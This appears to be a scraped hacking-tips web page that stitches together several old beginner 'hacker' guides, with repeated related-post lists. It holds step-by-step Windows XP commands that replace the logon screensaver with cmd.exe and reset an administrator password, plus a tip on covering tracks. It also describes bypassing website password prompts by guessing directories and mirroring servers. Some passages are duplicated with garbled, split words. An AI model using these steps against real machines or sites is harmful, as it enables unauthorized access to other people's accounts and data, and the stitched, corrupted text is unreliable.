But let’s forget all those Web search engines for a minute. In my humble yet old-fashioned opinion, the best way to search the Web is to use it exactly the way its inventor, Tim Berners-Lee, intended. You start at a good spot and then follow the links to related sites. Imagine that!

Here’s another of my old fogie tips. If you want to really whiz around the Web, and if you have a shell account, you can do it with the program lynx. At the prompt, just type “lynx followed by the URL you want to visit. Because lynx only shows text, you don’t have to waste time waiting for the

More how to search for hacker knowledge…

So where are good places to start? Simply surf over to the Web sites listed at the end of this Guide. Not only do they carry archives of these Guides, they carry a lot of other valuable information for the newbie hacker, as well as links to other quality sites. My favorites are http://www.cs.utexas.edu/users/matt/hh.html and http://www.silitoad.org
Warning: parental discretion advised. You’ll see some other great starting points elsewhere in this Guide, too.

Next, consider one of the most common questions I get: “How do I break into a computer????? “

Ask this of someone who isn’t a super nice elderly lady like me and you will get a truly rude reaction. Here’s why. The world is full of many kinds of computers running many kinds of software on many kinds of networks. How you break into a computer depends on all these things. So you need to thoroughly study a computer system before you an even think about planning a strategy to break into it. That’s one reason breaking into computers is widely regarded as the pinnacle of hacking. So if you don’t realize even this much, you need to do lots and lots of homework before you can even dream of breaking into computers.

Related posts

• How to learn to hack in easy steps (0)
• Hacking Password Protected Website’s By Pinglocalhost (0)
• Hacking on XP (0)
• Hacking Bank Of America’s Home Banking System (0)
• Hackers Who Break into Computer Systems (0)
• Hackers A-Z (0)
• Hack Passwords (0)
• What To Look For In A Code Hacking Program (0)
• Telnet: the Number One Hacker Tool (0)
• Hacking password protected site (0)

Hi there, I’m TDC and I’d like to give back all the things i’ve learnt from the hackers i’ve met. I want to write this because most tutorials i’ve found (very good tutorials) are now old and don’t fit just like they did before. This is why i’m going to teach you and show you the way to learn to hack.

If you are a hacker, you read this, and find something that’s not correct or you don’t like, i want to know. mail me.

I’m sure you’ll find a lot of bad-grammars. Don’t report them cause I’m not english and i don’t care at all as long as it’s understandable.

On this document I talk about many security tools, you can find all them and also contact me on my site: www.3b0x.com

When you finish reading it, please TELL ME how you like it!

I want to make newer versions of it, check on my site to stay informed.

COPYING: You’re welcome to distribute this document to whoever the hell you want, post it on your website, on forums, newsgroups, etc, AS LONG as you DON’T MODIFY it at all. If you want to perform it, ask me for permission. thanks a lot!

DISCLAIMER: This document is intended for ludical or educational purposes. I don’t want to promote computer crime and I’m not responible of your actions in any way. If you want to hack a computer, do the decent thing and ask for permission first.

LET’S START

If you read carefully all what i’m telling here, you are smart and you work hard on it, you’ll be able to hack. i promise. That doesn’t really make you a hacker (but you’re on the way). A hacker is someone who is able to discover unknown vulnerabilities in software and able to

write the proper codes to exploit them.

NOTE: If you’ve been unlucky, and before you found this document, you’ve readen the guides to (mostly) harmless hacking, then forget everything you think you’ve learnt from them. You won’t understand some things from my tutorial until you unpoison your brain.

SOME DEFINITIONS

I’m going to refer to every kind of computer as a box, and only as a box. This includes your PC, any server, supercomputers, nuclear silos, HAL9000, Michael Knight’s car, The Matrix, etc.

The systems we’re going to hack (with permission) are plenty of normal users, whose don’t have any remote idea about security, and the root. The root user is called

superuser and is used by the admin to administer the system.

I’m going to refer to the users of a system as lusers. Logically, I’ll refer to the admin as superluser.

OPERATING SYSTEMS

Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x, or perhaps a mac (motorola) box running macOS.

You can’t hack with that. In order to hack, you’ll need one of those UNIX derived operating systems.

This is for two main reasons:

-the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and so on. To hack one of them, you need a minimun knowledge of a UNIX system, and what’s better than running it at home?

-all the good hacking tools and exploit codes are for UNIX. You won’t be able to use them unless you’re running some kind of it.

Let’s see where to find the unix you’re interested on.

The UNIX systems may be divided in two main groups:

- commercial UNIXes

- free opensource UNIXes

A commercial unix’s price is not like windoze’s price, and it usually can’t run on your box, so forget it.

The free opensource UNIXes can also be divided in:

- BSD

These are older and difficult to use. The most secure OS (openBSD) is in this group.

You don’t want them unless you’re planning to install a server on them.

- Linux

Easy to use, stable, secure, and optimized for your kind of box. that’s what we need.

I strongly suggest you to get the SuSE distribution of Linux.

It’s the best one as i think, and i added here some tips for SuSE, so all should be easier.

Visit www.suse.de and look for a local store or order it online.

(i know i said it the software was free, but not the CDs nor the manual nor the support.

It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)

If you own an intel box, then order the PC version.

If you own a mac box, then order the PowerPC version.

Whatever you do, DON’T PICK THE COREL DISTRIBUTION, it sucks.

It’s possible you have problem with your hardware on the installation. Read the manual, ask for technical support or buy new hardware, just install it as you can.

This is really important! READ THE MANUAL, or even buy a UNIX book.

Books about TCP/IP and C programming are also useful.

If you don’t, you won’t understand some things i’ll explain later. And, of course, you’ll never become a hacker if you don’t read a lot of that ‘literature’.

THE INTERNET

Yes! you wanted to hack, didn’t you? do you want to hack your own box or what?

You want to hack internet boxes! So lets connect to the internet.

Yes, i know you’ve gotten this document from the internet, but that was with windoze and it was much easier. Now you’re another person, someone who screams for knowledge and wisdom.

You’re a Linux user, and you gotta open your way to the Internet.

You gotta make your Linux box to connect to the net, so go and set up your modem (using YaST2 in SuSE).

Common problems:

If your box doesn’t detect any modems, that probably means that you have no modem installed (not a joke!).

Most PCI modems are NOT modems, but “winmodems”. Winmodems, like all winhardware, are specifically designed to work ONLY on windoze. Don’t blame linux, this happens because the winmodem has not a critical chip that makes it work. It works on windoze cause the vendor driver emulates that missing chip. And hat vendor driver is only available for windoze.

Related posts

• How to use the Web to look up information on hacking (0)
• Hacking Password Protected Website’s By Pinglocalhost (0)
• Hacking on XP (0)
• Hacking Bank Of America’s Home Banking System (0)
• Hackers Who Break into Computer Systems (0)
• Hackers A-Z (0)
• Hack Passwords (0)
• What To Look For In A Code Hacking Program (0)
• Telnet: the Number One Hacker Tool (0)
• Hacking password protected site (0)

——————————————————————————

This hack will only work if the person that owns the machine has no intelligence. This is how it works:

When you or anyone installs Windows XP for the first time your  asked to put in your username and up to five others.

Now, unknownst to a lot of other people this is the only place in Windows XP that you can password the default Administrator Diagnostic Account. This means that to by pass most administrators accounts on Windows XP all you have to do is boot to safe mode by pressing F8 during boot up and choosing it. Log into the Administrator Account and create your own or change the password on the current Account.

This only works if the user on setup specified a password for the Administrator Account.

This has worked for me on both Windows XP Home and Pro.

—————————————————————————–

Now this one seems to be machine dependant, it works randomly(don’t know why)

If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly:

(this appeared on www.astalavista.com a few days ago but i found that it wouldn’t work on the welcome screen of a normal booted machine)

—————————————————————————–

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

—————————————————————————–

Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

“net user <admin account name here> password”

If the Administrator Account is called Frank and you want the password blah enter this

“net user Frank blah”

and this changes the password on franks machine to blah and your in.

Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Any updates, Errors, Suggestions or just general comments mail them to either

Estyle89@hotmail.com
jaoibh@hotmail.com

Related posts

• Hacking Password Protected Website’s By Pinglocalhost (0)
• Hacking password protected site (0)
• How to use the Web to look up information on hacking (0)
• How to learn to hack in easy steps (0)
• Hacking on XP (0)
• Hacking Bank Of America’s Home Banking System (0)
• Hackers Who Break into Computer Systems (0)
• Hackers A-Z (0)
• What To Look For In A Code Hacking Program (0)
• Telnet: the Number One Hacker Tool (0)

[ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com .

Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in     www.target.com/images,    there is a .gif named gamestitle.gif . There is a good chance then, that there is a ‘games’ directory on the site,so you would then type in    www.target.com/games,   and if it isa valid directory, you again get a text listing of all the files available there.

For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can’t get past an opening “PasswordRequired” box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it’s hosted by www.host.com at 100.100.100. 1.

We then go to 100.100.100.1, and then launch \Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don’t care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find  /target.  When we open that directory, we find its contents, and all of its sub-directories listed. Let’s say we find    /target/games/zip/zipindex.html .  This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url    www.target.com/games/zip/zipindex.html   you will be onthe index page and ready to follow the links for downloading.

(DISCLAIMER)

The Info Above Is Lame!!!. I Dont Condone The Use Of This Document In A Malisous Manner. I Suggest That U Dont Do it But U Do What Ever U Want. I Will Not Be Responsible For Any Thing That Might Happen To U If U Use This. 

Related posts

• Hack Passwords (0)
• Hacking password protected site (0)
• How to use the Web to look up information on hacking (0)
• How to learn to hack in easy steps (0)
• Hacking on XP (0)
• Hacking Bank Of America’s Home Banking System (0)
• Hackers Who Break into Computer Systems (0)
• Hackers A-Z (0)
• What To Look For In A Code Hacking Program (0)
• Telnet: the Number One Hacker Tool (0)

browser, ie: you w ant access to www.target.com . Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directo ry, and give you a text list of all the images located there. Often, the t itle of an image will give you a clue to the  name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a g ood chance then, that there is a ‘games’ directory on the site, so you wou ld then type in www.target.com/games, and if it is a valid directory, you aga in get a text listing of all thefiles available there. For a more automated a pproach, use a program like WEB SNAKE from anawave, or Web Wacker. These pro grams will create a mirror image of an entire web site, showing all director ies, or even mirror a complete server. They are indispensable for locating hidden files and directories.

What do you do if you can’t get past an openin g “Password Required” box? First do an WHOIS Lookup for the site. In our example, www.target.com . We find it’s hosted by www.host.com at 100.100.100. 1. We then go to 100.100.100.1, and then launch \ Web Snake, and mirror the e ntire server. Set Web Snake to NOT download anything over about 20K. (not ma ny HTML pages are bigger than this) This speeds things up some, and keeps yo u from getting a lot of files and images you don’t care about. This can take a  ong time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of i ts sub-directories listed. Let’s say we find  target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.

By simply typ ing in the url www.target.com/games/zip/zipindex.html you will be on the index page and ready to follow the links for downloading.

Related posts

• Hacking Password Protected Website’s By Pinglocalhost (0)
• Hack Passwords (0)
• What To Look For In A Code Hacking Program (0)
• Telnet: the Number One Hacker Tool (0)
• How to use the Web to look up information on hacking (0)
• How to learn to hack in easy steps (0)
• Hacking on XP (0)
• Hacking in telnet ftp (0)
• Hacking For Newbies (0)
• Hacking for Dummies Volume 2 (0)

In this guide you will learn how to telnet <beginninea.shtml>, forge email, <beginnineb.shtml>
use nslookup <beginninec.shtml> and netcat <beginnined.shtml> with Windows XP.

So you have the newest, glitziest, “Fisher Price” version of Windows: XP. How can you use XP in a way that sets you apart from the boring millions of ordinary users?

****************
Luser Alert: Anyone who thinks this GTMHH will reveal how to blow up people’s TV sets and steal Sandra Bullock’s email is going to find out that I won’t tell them how.
****************

The key to doing amazing things with XP is as simple as D O S. Yes, that’s right, DOS as in MS-DOS, as in MicroSoft Disk Operating System. Windows XP (as well as NT and 2000) comes with two versions of DOS. Command.com is an old DOS version. Various versions of command.com come with Windows 95, 98, SE, ME, Window 3, and DOS only operating systems.

The other DOS, which comes only with the XP, 2000 and NT operating systems, is cmd.exe. Usually cmd.exe is better than command.com because it is easier to use, has more commands, and in some ways resembles the bash shell in Linux and other Unix-type operating systems. For example, you can repeat a command by using the up arrow until you back up to the desired command. Unlike bash, however, your DOS command history is erased whenever you shut down cmd.exe. The reason XP has both versions of DOS is that sometimes a program that won?t run right in cmd.exe will work in command.com

****************
Flame Alert: Some readers are throwing fits because I dared to compare DOS to bash. I can compare cmd.exe to bash if I want to. Nanny nanny nah nah.
****************

DOS is your number one Windows gateway to the Internet, and the open sesame to local area networks. From DOS, without needing to download a single hacker program, you can do amazingly sophisticated explorations and even break into poorly defended computers.

****************
You can go to jail warning: Breaking into computers is against the law if you do not have permission to do so from the owner of that computer. For example, if your friend gives you permission to break into her Hotmail account, that won’t protect you because Microsoft owns Hotmail and they will never give you permission.
****************
****************
You can get expelled warning: Some kids have been kicked out of school just for bringing up a DOS prompt on a computer. Be sure to get a teacher’s WRITTEN permission before demonstrating that you can hack on a school computer.
****************

So how do you turn on DOS?
Click All Programs -> Accessories -> Command Prompt
That runs cmd.exe. You should see a black screen with white text on it, saying something like this:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Your first step is to find out what commands you can run in DOS. If you type “help” at the DOS prompt, it gives you a long list of commands. However, this list leaves out all the commands hackers love to use. Here are some of those left out hacker commands.

TCP/IP commands:
telnet
netstat
nslookup
tracert
ping
ftp

NetBIOS commands (just some examples):
nbtstat
net use
net view
net localgroup

TCP/IP stands for transmission control protocol/Internet protocol. As you can guess by the name, TCP/IP is the protocol under which the Internet runs. along with user datagram protocol (UDP). So when you are connected to the Internet, you can try these commands against other Internet computers. Most local area networks also use TCP/IP.

NetBIOS (Net Basic Input/Output System) protocol is another way to communicate between computers. This is often used by Windows computers, and by Unix/Linux type computers running Samba. You can often use NetBIOS commands over the Internet (being carried inside of, so to speak, TCP/IP). In many cases, however, NetBIOS commands will be blocked by firewalls. Also, not many Internet computers run NetBIOS because it is so easy to break in using them. We will cover NetBIOS commands in the next Guide to XP Hacking.

Related posts

• How to use the Web to look up information on hacking (0)
• How to learn to hack in easy steps (0)
• Hacking Password Protected Website’s By Pinglocalhost (0)
• Hacking Bank Of America’s Home Banking System (0)
• Hackers Who Break into Computer Systems (0)
• Hackers A-Z (0)
• Hack Passwords (0)
• What To Look For In A Code Hacking Program (0)
• Telnet: the Number One Hacker Tool (0)
• Hacking password protected site (0)